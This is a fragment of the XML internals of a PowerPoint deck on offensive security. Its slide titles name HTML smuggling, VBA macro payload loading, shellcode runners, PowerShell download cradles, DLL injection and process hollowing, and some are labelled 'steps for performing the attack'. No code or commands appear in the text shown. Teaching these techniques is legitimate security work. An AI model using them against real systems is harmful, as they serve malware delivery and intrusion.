          <p:cNvPr id="5122" name="Picture 2" descr="Screenshot of code of HTML smuggling page ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58DF3FD7-477B-83E5-26E4-1CC924F79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391" y="1521161"/>
            <a:ext cx="5054973" cy="405611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creenshot of HTML code for dropping ZIP file ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AC78EAC-9566-3B71-7A6B-E5845A427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110" y="1498759"/>
            <a:ext cx="6113089" cy="4056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374905"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Metropolita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1048</TotalTime>
  <Words>2593</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>259</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Poppins</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Metropolitan</vt:lpstr>
      <vt:lpstr>HTML Smuggling</vt:lpstr>
      <vt:lpstr>HTML Smuggling</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTML smuggling overview</vt:lpstr>
      <vt:lpstr>How HTML smuggling works</vt:lpstr>
      <vt:lpstr>How HTML smuggling works</vt:lpstr>
      <vt:lpstr>Real-world examples of threats using HTML smuggling</vt:lpstr>
      <vt:lpstr>Real-world examples of threats using HTML smuggling</vt:lpstr>
      <vt:lpstr>Social Engineering Toolkit</vt:lpstr>
      <vt:lpstr>Social Engineering Toolkit</vt:lpstr>
      <vt:lpstr>VBA Macros</vt:lpstr>
      <vt:lpstr>VBA Macros</vt:lpstr>
      <vt:lpstr>How to load malicious payload using Macros</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Shellcode Runners in Offensive Security</vt:lpstr>
      <vt:lpstr>Shellcode Runners in Offensive Security</vt:lpstr>
      <vt:lpstr>PowerShell Download Cradle</vt:lpstr>
      <vt:lpstr>Download Cradle vs. Traditional File Transfer Methods </vt:lpstr>
      <vt:lpstr>Common PowerShell Cmdlets</vt:lpstr>
      <vt:lpstr>Message Box Display - Macros</vt:lpstr>
      <vt:lpstr>Message Box Display - Macros</vt:lpstr>
      <vt:lpstr>Open a program in VBA Macros</vt:lpstr>
      <vt:lpstr>Open a program in VBA Macros</vt:lpstr>
      <vt:lpstr>Shortcut to open the MSapps</vt:lpstr>
      <vt:lpstr>Shortcut to open the MSapps</vt:lpstr>
      <vt:lpstr>Shortcut to open the MSapps</vt:lpstr>
      <vt:lpstr>Workbook_Open_Close</vt:lpstr>
      <vt:lpstr>Process Injection</vt:lpstr>
      <vt:lpstr>Dll Injection (dynamic link libraries)</vt:lpstr>
      <vt:lpstr>Steps for performing the attack</vt:lpstr>
      <vt:lpstr>Reflective DLL injection</vt:lpstr>
      <vt:lpstr>Steps for performing the attack</vt:lpstr>
      <vt:lpstr>Portable Executable Loading (Injection)</vt:lpstr>
      <vt:lpstr>Steps for performing the attack</vt:lpstr>
      <vt:lpstr>Process Hollowing</vt:lpstr>
      <vt:lpstr>Steps for performing the attack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Smuggling</dc:title>
  <dc:creator>idaseraphim@outlook.com</dc:creator>
  <cp:lastModifiedBy>idaseraphim@outlook.com</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-28T02:59:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-04T08:34:57Z</dcterms:modified>
</cp:coreProperties>
</file>